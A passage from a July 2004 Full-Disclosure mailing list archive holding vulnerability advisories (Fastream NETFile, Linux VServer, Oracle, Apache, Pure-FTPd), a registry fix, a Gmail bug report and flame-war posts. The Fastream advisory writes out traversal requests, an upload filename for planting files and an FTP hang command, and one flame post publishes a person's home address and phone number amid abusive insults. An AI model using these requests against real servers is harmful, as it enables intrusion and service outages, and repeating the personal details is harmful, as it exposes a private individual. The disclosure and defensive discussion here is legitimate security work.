OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] oracle 10g installer race condition

From: Knud Erik Højgaard (kainircop.dk)
Date: Sat Jul 03 2004 - 18:06:54 CDT

http://kokanins.homepage.dk/or0rcle.txt

Unbreakable oracle people not informed, this bug is stupid and next to
useless, hence the disclosure. One can only wonder what the coders are
thinking when they chmod 777 stuff.

--
kokanin

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] RE: Registry Fix For Variant of Scob

From: Thor Larholm (thorpivx.com)
Date: Sat Jul 03 2004 - 17:47:30 CDT

Setting the kill bit on the "Shell.Application" ActiveX object, or any
other ActiveX, is a system wide configuration change. This is also the
reason for the incompatibility issues you are mentioning, but there is
no reason to kill the bird to secure the nest.

The problem here is not the ADODB.Stream or Shell.Application objects,
the problem is the insecure My Computer zone in Internet Explorer. Your
registry fix will have adverse functionality regressions on any Windows
administrator that use WSH when there is no reason for this. ActiveX
objects are used in many hosts of which IE is just one, others include
Jscript, VBScript, HTML Applications and WSH, all of which run outside
of the browser and require executional privileges to launch in the first
place.

The prerequisite for even having privileges enough to launch the
Shell.Application ActiveX object inside IE is to have script running in
the My Computer zone. Locking down this zone will completely prevent
this exploit, without introduing functionality regressions in other
parts of Windows. In fact, if you had implemented the registry changes I
described back in early September 2003 you would have been safe against
all the command execution vulnerabilities that have subsequently been
discovered - including ADODB.Stream and Shell.Application who are
themselves just minor components of a larger exploit prerequisite.

http://www.securityfocus.com/archive/1/346174/2003-11-30/2003-12-06/0

I am sure that tomorrow, next week and next month we will find even more
ways to exploit insecure zone privileges in IE. You can either try to
fix the root cause once or you can try to treat each new symptom as it
is discovered.

There is no need to hurridly introduce last-minute system wide
functionality regressions such as killbitting Shell.Application, all you
need to do is lock down the My Computer zone in IE properly. We
implemented this in Qwik-Fix last September and have since then not had
to worry about exploits that target these design principles in IE.
Instead, we have been able to focus our efforts on securing other parts
of Windows as opposed to scramble to cope up with each new exploit from
jelmer or http-equiv. You can get a free copy of Qwik-Fix Pro at

http://qwik-fix.net

All software is inherently insecure, the difference is in how you treat
that insecurity.

Regards

Thor Larholm
Senior Security Researcher
PivX Solutions
24 Corporate Plaza #180
Newport Beach, CA 92660
http://www.pivx.com
thorpivx.com
Stock symbol: (PIVX)
Phone: +1 (949) 231-8496
PGP: 0x5A276569
6BB1 B77F CB62 0D3D 5A82 C65D E1A4 157C 5A27 6569

PivX defines a new genre in Desktop Security: Proactive Threat
Mitigation.
<http://www.pivx.com/qwikfix>
-----Original Message-----
From: Drew Copley [mailto:dcopleyeEye.com]
Sent: Friday, July 02, 2004 2:33 PM
To: Windows NTBugtraq Mailing List; bugtraqsecurityfocus.com
Subject: Registry Fix For Variant of Scob

About the same time Jelmer found the adodb bug, http-equiv found a
similiar issue with the object "Shell.Application".

This issue has also been unfixed for the past ten months.

Unfortunately, Microsoft has not taken the "hint" and not
fixed this issue either.

Jelmer has noted this and made a proof of concept exploit
page here: http://62.131.86.111/security/idiots/malware2k/installer.htm

The below registry file will protect you from this exploit
by kill biting "Shell.Application" variant.

<------------------------------------------->
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX
Compatibility\{13709620-C279-11CE-A49E-444553540000}]
"Compatibility Flags"=dword:00000400
<-------------------------------------------->

I will be updating our free fix download here:
http://www.eeye.com/html/research/alerts/AL20040610.html

This will break some hta scripts that might be used
for management. It may cause some incompatibility issues
with some programs.

Shell.Application is commonly used by administrators
for administration of systems via Visual basic script
or WSH. It may have other uses. It is kind of Microsoft's answer to
shell script -- though not as happy as batch.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] Linux Virtual Server/Secure Context procfs shared permissions flaw

From: Veit Wahlich (cruzodia.de)
Date: Sat Jul 03 2004 - 21:33:52 CDT

Linux Virtual Server/Secure Context procfs shared permissions flaw
==================================================================

2004-07-02, Veit Wahlich <cruzodia.de>

Official location of this document: http://ircnet.de/article.shtml?vsproc

Product|
-------+

Linux Virtual Server extends the Linux kernel to provide the ability to
run several virtual servers on a single host system. In contrast to
other virtualization attempts Linux Virtual Server uses a split-
userland architechture under a single kernel to optimize sharing of all
resources and reduce resource consumption overhead per VM to the
absolute minimum.
http://www.linux-vserver.org/

Synopsis|
--------+

During a security audit on the vproc security scheme a permission-
sharing vulnerability was discovered.

Vulnerable|
----------+

<= 1.27 (Linux 2.4 stable branch)
<= 1.3.9 (Linux 2.4 devel branch)
<= 1.9.1 (Linux 2.6 devel branch)

Severity|
--------+

- local DoS
- creation of information leaks

See details below.

History|
-------+

2004-06-30 vuln discovered
2004-07-02 vendor informed
2004-07-03 first vendor response, confirmation
2004-07-04 official fix available, advisory release

Description|
-----------+

While auditing and experimenting with VServer procfs and vproc security
we discovered a problem sharing permissions on the procfs mounted
directories:

Within any context users are still able to change permissions on /proc,
both access permission and ownership. That is just fine as many people
would like to restrict access to /proc to the root user or a group of
trusted users.

But as changes to a procfs mountpoint do not apply to the mountpoint
itself but to procfs in general, these changes affect all contexts
(VServers) and even the host system.

All tests were done against the stable branch (1.2x) but regarding to
Herbert Poetzl, the problem exists on both devel branches (1.3.x,
1.9.x), too.

Version 1.28 (stable branch) resolves this problem.

Exploitation|
------------+

The vulnerability may be locally exploited in two ways:

1. From within a virtual server a denial of service attack (DoS) may be
provoked towards other virtual servers and the host system.
By setting permissions that prevent users other than root to read
information from procfs (i.e. process information) will disable a wide
range of services.

2. On systems where access to procfs is allowed to root only (or to a
group of trusted users; i.e. shared hosting environments), an attacker
may use access to another virtual server to gain critical information
about processes or other data on the primary target virtual server (or
the host system).

Work-around|
-----------+

To work around this problem, procfs may be mounted read-only. On the
host-system do:

# mount -o remount,ro /proc

As this also prevents the host system from changing any values in
/proc, this should just be a temporary solution!

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] [ADVISORY] Fastream NETFile FTP/Web Server

From: aT4r ins4n3 (at4rciberdreams.com)
Date: Sun Jul 04 2004 - 08:34:00 CDT

Fastream NETFile FTP/Web Server Input validation Errors
--------------------------------------------------------

Release Date: 4 July 2004

Severity: High

Systems Affected: Fastream NETFile FTP/Web Server <=v.6.7.2.1085

Systems Not Affected: Fastream NETFile FTP/Web Server v6.7.3

Vendor URL: http://www.fastream.com/netfileserver.htm

Original Advisory: http://www.haxorcitos.com/Fastream_advisory.txt

Author: Andres Tarasco Acuña
email: at4r haxorcitos.com
WEB: www.haxorcitos.com

------------------
1. Description
------------------

Vendor's Description:

"Fastream NETFile Server is a secure FTP server and Web server combined
together
in one application. Our claim is that it is the easiest to setup and use
server
on the Internet!"
"Fastream NETFile FTP Server is a multi-threaded FTP server with virtual
links,
quotas, U/D ratio and extremely fast directory and file caches. Besides
being a
fast FTP server with full user and group based permissions and file and
directory
 cache, NETFile Server is also a Web server that is developed for sharing
files.

Fastream NETFile Web Server is a web server with full HTTP 1.1
compatibility with
 support for multi-part downloads and keep-alive connections."

-------------------
2. Vulnerability
-------------------

There are some input validation errors in Fastream Netfile that allow
users to
bypass the root directory restrictions.
Due to the fact that Fastream Netfile allow remote users to
upload/create/delete
 files in the application directory, its easy to exploit this
vulnerability and
compromise the system.
Another vulnerability was reported, in the way that Netfile handles some
Urls.
After requestin a special crafted directory it's possible to cause a 1 minute
Denial of Service.

-------------------
3. Exploit code
-------------------

The problem is in the way that Netfile handles two Slashes.
example URL:

http://HOST:PORT/?command=mkdir&filename=..//FOLDER_IS_OUTSIDE_THE_ROOT_DIRECTORY

C:\>dir FOLDE*
 Volume in drive C is W2000P
 Volume Serial Number is xxxx-xxxx

 Directory of C:\

07/03/2004 07:47p <DIR> FOLDER_IS_OUTSIDE_THE_ROOT_DIRECTORY
               0 File(s) 0 bytes
               1 Dir(s) 119,015,936 bytes free

Netfile allows some other methods in the "command" parameter, that could
be used to
create/delete folders/files outside the Root directory.

To exploit the upload files vulnerability we need to take a look to the
data sent
in the POST request:

-----------------------------7d42c98700ea
Content-Disposition: form-data; name="upfile"; filename="D:\foo.txt"
Content-Type: text/plain

THIS IS AN EXAMPLE

-----------------------------7d42c98700ea--

Its possible for an attacker to modify the filename parameter to something
like:
Filename="//..//autorun.inf" and place malicious files in the system, or
overwrite
existing files.

Seems that the FTP Server is not vulnerable to this issue and transversal
directory
attacks are not possible, but there is another bug that allows malicious
users to cause
a denial of service by executing the following command:

D:\>ftp localhost
Connected to at4r.intranet.
220 Fastream NETFile FTP Server Ready
User (at4r.intranet:(none)): ftp
331 Password required for ftp.
Password:
230 User ftp logged in.
ftp> cd /////A <-- here the ftp server hangs for a lot of time
599 No such directory.
ftp>

-----------------
4. Solution:
-----------------

The best solution is to upgrade the software to version 6.7.3 that was
released by
vendor 3 july 2004.
Another way to minimize the impact of this vulnerability is to store the root
directory of Fastream netfile server in other partition and remove
create/delete file
and directory permissions from all users, included Guest accounts.

-------------------
5. Timeline
-------------------

DISCLOSURE TIMELINE:
-3 July, 2004: Vendor Contacted.
-3 July, 2004: Issue Fixed after 2 hours. New release 6.7.3 available
-4 July, 2004: Public Disclosure

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] VERY HIGH VULNERABILITY DISCLOSURE !!! MASS ROOT POSSIBLE !!! PLEASE BE ATTENTIVE !!!

From: nicolas vigier (boklmmars-attacks.org)
Date: Sun Jul 04 2004 - 08:32:15 CDT

On Sat, 03 Jul 2004, Frog Mn wrote:

> WE ARE LOOKING FOR A JOB IN THE SECURITY RESEARCH

Thanks, that was funny.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] IE Web Browser: "Sitting Duck"

bills.bitchhushmail.com
Date: Sat Jul 03 2004 - 15:45:13 CDT

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

ha ha ha ha ha the dog bites his master he he he he

Couple of things

Judge: What is this Internet Explorer thing Gates?
Bll Gates: Its a core component of the operating sytem ma'am
Judge: BULLSHIT GATES! JOE SAYS IT ISN'T

Judge: YOUR GUILTY!
Bill Gates: oh
JUDGE: 6 POSSIBLE SENTENSES, JAIL, FINE, FIX, REPENT, SUSPEND, GO TO
JOE SCHOOL OF REHABILITATION
joe: you see you see, the judge has given him six options, that means
he's not guilty, do you see what I mean. Can you see it can you see it.

By the way did I tell you about my last gig, I made a whack of dough
off it and now I am sitting on the beach in Taihiti sucking back margaritas.

*sigh* I wish I were Bill Gates, he be so cool

-----BEGIN PGP SIGNATURE-----
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.4

wkYEARECAAYFAkDnGt4ACgkQ9hJzGKhH2LeB8QCfannTbF14n/e2+gsGCHrr8bslFRAA
oLNZTgVQWsDJqDtjYdzDoHvDRy89
=HDOv
-----END PGP SIGNATURE-----

Concerned about your privacy? Follow this link to get
secure FREE email: http://www.hushmail.com/?l=2

Free, ultra-private instant messaging with Hush Messenger
http://www.hushmail.com/services-messenger?l=434

Promote security and make money with the Hushmail Affiliate Program:
http://www.hushmail.com/about-affiliate?l=427

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
RE: [Full-Disclosure] The "Drew Copley is a prick" Poll update [Time to Grow Up]

From: Bugtraq Security Systems (researchbugtraq.org)
Date: Sun Jul 04 2004 - 10:26:17 CDT

Hi Thomas!

Nice! We're glad to see all those lonely nights watching Matlock were time
well spent. The fact that you'd even consider legal action over being
called a prick tells us alot. So let us go out on a limb here and state
that you too are indeed a fucking prick. There. We said it. Is that the
very fabric of society we hear crumbling right there?

Thomas. You're a moron. And you know it. Deep down you realise you lack
what it takes in every aspect of your professional life. That's why you
keep on buying into those self motivational courses that tell you to
"approach business with the sunny side up!" and make you get colonics to
align your chakra. You're a fraud and an imposter, and you have no place
in security. Is it our place to inform you of these facts? Fuck yes it
is.

We're sick of of the likes of you and the army of pedantic clueless pricks
you represent. The sooner you go back to designing websites for your
next of kin, the better.

Have a great weekend and leave "Making the Inetrnet(sic) a Secure Place of
Business" to someone with half a clue. You dyslexic fuck.

Love,
Team Bugtraq Security

On Sun, 4 Jul 2004, Thomas Ryan wrote:

> The lack of professionalism from Team Bugtraq Security is getting to be
> annoying, openly showing their ignorance with defamatory remarks towards
> Drew Copley and eEye. It's quite obvious you don't have a complete
> understanding of the law, otherwise you would realize that you can be sued
> for deformation of character and slander. Dummying your information in
> Dotster (Your Registrar) and hiding behind ziplip.com won't do you any good.
> Have you heard of a subpoena?
>
> IF you have nothing constructive to say, then please don't waste everyone's
> bandwidth, packets, hard drive space or our energy to delete your emails!
>
> Have a great weekend everyone!
>
> Thomas Ryan
> Provide Security
>
> -----Original Message-----
> From: full-disclosure-adminlists.netsys.com
> [mailto:full-disclosure-adminlists.netsys.com] On Behalf Of Bugtraq
> Security Systems
> Sent: Thursday, July 01, 2004 16:55
> To: full-disclosurelists.netsys.com
> Subject: [Full-Disclosure] The "Drew Copley is a prick" Poll update
>
> Hi list!
>
> Due to overwhelming response we request that you direct your submissions
> for the official Bugtraq Security "Drew Copley is a fucking prick" poll to
> drewpollbugtraq.org. We'd also like to note that all submissions are
> treated as strictly confidential and that our resident longhaired hippie
> is more than willing to take any beatings in Vegas in your name, as he'll be
> announcing the results during eEye's blackhat speech.
>
> Thank you,
> Team Bugtraq Security
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] The "Drew Copley is a prick" Poll update (vote++)

From: Boggles (boggleshush.com)
Date: Sun Jul 04 2004 - 10:19:12 CDT

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hi Tom, Happy 4th July.

>The lack of professionalism from Team Bugtraq Security is getting to
be
>annoying,

We'll start there.

we do love the summer holidays, each year more pre-pubescents emerge,
 watch the various uber films (Shrek for example) and post to this list.

As we are questioning professionalism of Bugtraq why don't we play the
"pot kettle black" game.

and we quote:
"Provide Security - Making the Inetrnet a Secure Place of Business"

If you can't spot the problem there maybe you shouldn't have started
your holiday so soon.

Next, as a professional "Tom", why is it that your wasting company resources
by posting to this list (more on this later.)

>openly showing their ignorance with defamatory remarks

Ignorance, oh ok. Yes CSS is a new attack isn't it.

>towards
>Drew Copley and eEye. It's quite obvious you don't have a complete
>understanding of the law, otherwise you would realize that you can be

With your "complete understanding" (inferred from above) Could you please
tell us about the current legal status of Turkey and Gerbil weddings
in California?

>for deformation of character and slander.

Oh goodie he's one of them. What is it? can't make money with "consultancy"
so sue your way to the top?

>Dummying your information in
>Dotster (Your Registrar) and hiding behind ziplip.com won't do you any
>good.

we sense Bugtraq panicing... no really. we do. serious.

but to save effort:

      Ryan, Thomas thomasrplanetgrafx.com
      providesecurity.com
      2027 E71st Street
      Brooklyn, New York 11234
      United States
       (718) 444-3808

and to save MORE effort:

http://mappoint.msn.com/map.aspx?L=USA&C=40.59748%2c-73.90502&A=28.66667&P=|40.59748%2c-
73.90502|1|11234|L1|

see, Boggles can be 3l1T3 like Tom and use whois. But Boggles much more
3l1t3 by giving MAP (*gasp*)!

There is no company return (yet)
we are sure with as much legal action as you can afford,
that there will be a good company return yet to come.

oh, Mr legal Guru (makes a change from a "Security BASICS" Guru doesn't
it) why dost thou asketh questions such as:

And:
"
   Subject: HIPAA Standards

   Where can I find information on the current HIPAA Security Standards?

   Thanks!

   Tom
"

doesn't your complete understanding of the law mean you should are MAKING
THE LAWS.

>Have you heard of a subpoena?

Passive version of a poena?

>IF you have nothing constructive to say,

Follow Tom's lead and email full-disclosure.

- --
Mr Security Industry say:
            "Please gimme 0day, I need to make a living".
             "huh? you use packetstorm too?!?"
            [o-o]
            __|__
            _( )_

-----BEGIN PGP SIGNATURE-----
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.4

wkYEARECAAYFAkDoH94ACgkQ2IK15vxw2kPDMgCbB2mwNXeuMgDb+UEPIHPd2yQb31MA
nA1beaX7jRgn1nYdIqq1SUkFLur2
=QOWD
-----END PGP SIGNATURE-----

Concerned about your privacy? Follow this link to get
secure FREE email: http://www.hushmail.com/?l=2

Free, ultra-private instant messaging with Hush Messenger
http://www.hushmail.com/services-messenger?l=434

Promote security and make money with the Hushmail Affiliate Program:
http://www.hushmail.com/about-affiliate?l=427

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] Re:Bugtraq Security Systems

From: bitlance winter (bitlance_3hotmail.com)
Date: Sun Jul 04 2004 - 12:36:50 CDT

Who are YOU,Bugtraq Security Systems?
Are YOU foo,bar.foobar?
;)
YOU say LOVE,OK.

[blockquote]
"With burning brain and heart of hate,
I sought my wronger, early, late,
And all the wretched night and day
My dream and thought was slay, and slay.
My better self rose uppermost,
The beast within my bosom lost
Itself in love; peace from afar
Shone o'er me radiant like a star.
I Slew my wronger with a deed,
A deed of love; I made him bleed
With kindness, and I filled for years
His soul with tenderness and tears."

Let those who aim at the right life, who believe that they love Truth, cease
to passionately oppose themselves to others, and let them strive to calmly
and wisely understand them, and in thus acting toward others they will be
conquering themselves; and while sympathizing with others, their own souls
will be fed with the heavenly dews of kindness, and their hearts be
strengthened and refreshed in the Pleasant Pastures of Peace.
[/blockauote]

Best Regards.
--
bitlance winter.

_________________________________________________________________
Is your PC infected? Get a FREE online computer virus scan from McAfee®
Security. http://clinic.mcafee.com/clinic/ibuy/campaign.asp?cid=3963

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Public Review of OIS Security Vulnerability Reporting and Response Guidelines

From: dave (daveimmunitysec.com)
Date: Sun Jul 04 2004 - 12:18:35 CDT

Nobody trusts the OIS or its motives. I imagine this is similar to the
feedback you've gotten from everyone else as well, but Immunity has no
plans to subscribe to your guidelines, and is going to oppose any
efforts you make to legislate those guidelines as law. In section 1.1
the draft proposes that the purpose of the OIS's model is to protect
systems from vulnerabilities. This is fairly obviously untrue - the
purpose of the OIS is to lobby towards a business model for Microsoft
and the other OIS members that involves the removal of non-compliant
security researchers.

This call for feedback is a thinly disguised attempt to get public
legitimacy and allow the OIS to claim it has community backing, which it
clearly does not.

It's rare, but there are still security companies and individuals who do
not owe their entire business to money from Microsoft. It's July 4th.
and some of us are Americans who understand the concept of independance.

Dave Aitel
Immunity, Inc.

OIS wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> The Organization for Internet Safety (OIS) extends an invitation to
> the readers of the BugTraq, NTBugtraq, and Full-Disclosure mailing
> lists to participate in the ongoing public review of the OIS Security
> Vulnerability Reporting and Response Guidelines.
> The OIS reviews the Guidelines annually to ensure that they remain
> useful and relevant to the security community and, most importantly,
> to the millions of computer users who are the ultimate beneficiaries
> of effective computer security practices. Over the past year, OIS
> has received feedback from many adopters of the Guidelines as well as
> from several public-private partnerships, and have incorporated much
> of this feedback into an interim version that is available at
> http://www.oisafety.org/review/draft-1.5.pdf. We recommend reviewing
> the interim version, but reviewers are welcome to provide feedback on
> the original version at http://www.oisafety.org/reference/process.pdf
> if they would like.
>
> For more information on the public review, please visit
> http://www.oisafety.org/review-1.5.html. The closing date for the
> review has been extended until 16 July 2004. We look forward to your
> feedback.
>
> Regards,
>
> The Organization for Internet Safety
> www.oisafety.org
>
> -----BEGIN PGP SIGNATURE-----
> Version: PGP 8.0.3
>
> iQA/AwUBQOWQgbF9hclyvjnOEQIhmACfYlaHX2NnJbHUCaCYfMHO4tkGDh0AoMzz
> KWNTvxgQVKXiC1OU9CR/rXYF
> =4mT/
> -----END PGP SIGNATURE-----
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
RE: [Full-Disclosure] The "Drew Copley is a prick" Poll update [Time to Grow Up]

From: Mortis (m0rtisadelphia.net)
Date: Sun Jul 04 2004 - 13:17:07 CDT

I told you that would be more fun than fishing with dynamite.

Plenty of fresh worms for a hungry turkey.

Sort your mail box and go to town.
--
Libel-libel,
Dan eel
http://full-disclosure.50megs.com/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] Gmail Information Disclosure Vulnerability

amforwardmailsurf.com
Date: Sun Jul 04 2004 - 14:10:44 CDT

Brief
--------------
While I was playing with Gmail, I found a bug that may disclose
information about the users currently attempting to register a new
Gmail account. This seems to be a vulnerability with low severity (at
least until now).

CheckAvailability Script
--------------
In the registration page, the "Check Availability" button queries a
certain script, namely /accounts/CheckAvailability. The script takes
the desired username, and checks if it is available. If it is not
available, it suggests other usernames by contactenating, for example,
your last name to it.

The Problem
--------------
There seems to be a thread-safety problem with CheckAvailability
script. When the script is under heavy stress, it may return answers
to queries that are not yours, revealing others' desired usernames,
and first and last names.(see attached screen shot)

Reproduction
--------------
To reproduce it, you should:

AND
a. Have a valid Gmail invitation
b. Frequently Invoke CheckAvailability by
~ OR
~ 1. Creating a tool that automates the script invocation.
~ 2. Having the patience and keep clicking the button frequently (this
works too!).

I have not yet carefully studied the script, but I think it might not
be a problem with this script only, but others as well. Your thoughts
are appreciated.

Regards,
Ahmed Motaz

------------------------------------------------------
Mailsurf.com your communication portal for SMS,
Email, Fax, E-Cards and more. www.mailsurf.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

gmail-screenshot.gif
 
[Full-Disclosure] Re: Public Review of OIS Security Vulnerability Reporting and ResponseGuidelines

From: Fred Mobach (fredmobach.nl)
Date: Sun Jul 04 2004 - 13:56:39 CDT

OIS wrote:
>
> The Organization for Internet Safety (OIS) extends an invitation to
> the readers of the BugTraq, NTBugtraq, and Full-Disclosure mailing
> lists to participate in the ongoing public review of the OIS Security
> Vulnerability Reporting and Response Guidelines.

I have problems with the OIS guidelines as I distrust at least one
member of OIS since it won't publish verifiable information on Bugtraq
since some years. When I combine the policy of that company with the
next statement from OIS's about.html page

"Does OIS support pre-disclosure of vulnerability information to select
groups?
No. We believe the software author should be given a chance to create a
fix before vulnerability information is made public, but that there
should be no further distribution of that information until the fix is
complete. This priniciple can be very difficult to adhere to in certain
situations, such as dealing with the open source community where there
aren't protections to keep vulnerability information secret."

I am afraid that that company might take years to supply a fix or even
to never supply that. A limit of at most four weeks before disclosure
seems reasonable to me. If that company cannot live with that it can opt
to die.

Another interesting point for me is the statement about the open source
community in the same paragraph. Some organizations still have problems
with that community, which is reflected by adopters.html webpage of OIS.
No representation of the open source community as far as I can see. But
please correct me if I am wrong.
--
Fred Mobach - fredmobach.nl - postmastermobach.nl
Systemhouse Mobach bv - The Netherlands - since 1976
website : http://fred.mobach.nl
Q: servos ad pileum vocare ?
A: servos fenestrae ad pileum rubrem vocare !

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] [ GLSA 200407-04 ] Pure-FTPd: Potential DoS when maximum connections is reached

From: Thierry Carrez (koongentoo.org)
Date: Sun Jul 04 2004 - 14:45:26 CDT

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200407-04
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Pure-FTPd: Potential DoS when maximum connections is
            reached
      Date: July 04, 2004
      Bugs: #54590
        ID: 200407-04

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Pure-FTPd contains a bug potentially allowing a Denial of Service
attack when the maximum number of connections is reached.

Background
==========

Pure-FTPd is a fast, production-quality and standards-compliant FTP
server.

Affected packages
=================

    -------------------------------------------------------------------
     Package / Vulnerable / Unaffected
    -------------------------------------------------------------------
  1 net-ftp/pure-ftpd <= 1.0.18 >= 1.0.18-r1

Description
===========

Pure-FTPd contains a bug in the accept_client function handling the
setup of new connections.

Impact
======

When the maximum number of connections is reached an attacker could
exploit this vulnerability to perform a Denial of Service attack.

Workaround
==========

There is no known workaround at this time. All users are encouraged to
upgrade to the latest available version.

Resolution
==========

All Pure-FTPd users should upgrade to the latest stable version:

    # emerge sync

    # emerge -pv ">=net-ftp/pure-ftpd-1.0.18-r1"
    # emerge ">=net-ftp/pure-ftpd-1.0.18-r1"

References
==========

  [ 1 ] Pure-FTPd website
        http://www.pureftpd.org

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

    http://security.gentoo.org/glsa/glsa-200407-04.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
securitygentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2004 Gentoo Technologies, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/1.0

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFA6F5WvcL1obalX08RAvu6AJ9YGZ55W44TfnJ04d6SW/zynBLAUwCfRXkx
fq1wAuhM5oqWwrCtSc25hNk=
=Pzab
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] [ GLSA 200407-03 ] Apache 2: Remote denial of service attack

From: Thierry Carrez (koongentoo.org)
Date: Sun Jul 04 2004 - 14:41:19 CDT

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200407-03
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Apache 2: Remote denial of service attack
      Date: July 04, 2004
      Bugs: #55441
        ID: 200407-03

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

A bug in Apache may allow a remote attacker to perform a Denial of
Service attack. With certain configurations this could lead to a heap
based buffer overflow.

Background
==========

The Apache HTTP Server Project is an effort to develop and maintain an
open-source HTTP server for modern operating systems. The goal of this
project is to provide a secure, efficient and extensible server that
provides services in tune with the current HTTP standards.

Affected packages
=================

    -------------------------------------------------------------------
     Package / Vulnerable / Unaffected
    -------------------------------------------------------------------
  1 net-www/apache <= 2.0.49-r3 >= 2.0.49-r4
                                                                   < 2

Description
===========

A bug in the protocol.c file handling header lines will cause Apache to
allocate memory for header lines starting with TAB or SPACE.

Impact
======

An attacker can exploit this vulnerability to perform a Denial of
Service attack by causing Apache to exhaust all memory. On 64 bit
systems with more than 4GB of virtual memory a possible integer
signedness error could lead to a buffer based overflow causing Apache
to crash and under some circumstances execute arbitrary code as the
user running Apache, usually "apache".

Workaround
==========

There is no known workaround at this time. All users are encouraged to
upgrade to the latest available version:

Resolution
==========

Apache 2 users should upgrade to the latest version of Apache:

    # emerge sync

    # emerge -pv ">=net-www/apache-2.0.49-r4"
    # emerge ">=net-www/apache-2.0.49-r4"

References
==========

  [ 1 ] Georgi Guninski security advisory #70, 2004
        http://www.guninski.com/httpd1.html
  [ 2 ] CAN-2004-0493
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0493

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

    http://security.gentoo.org/glsa/glsa-200407-03.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
securitygentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2004 Gentoo Technologies, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/1.0

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFA6F1fvcL1obalX08RAhz9AKCPeuWIsRNOW23muPm9Wg8o+4DsIgCeIKFG
tLPdwSIV5gDVQeZB8jcxozo=
=1rY3
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Web sites compromised by IIS attack

From: Jason Coombs (jasoncscience.org)
Date: Sun Jul 04 2004 - 16:01:04 CDT

>>frank, this is not a kindergarden list. this not a housewife support
>>list. this is a security list, this a full disclousure list. period.

It also is not a list for the benefit exclusively of people who are
fortunate enough to have simple security problems. The security issues
surrounding the question "how do I keep my home computer safe from
attack?" are trivial compared to those surrounding the question "how do
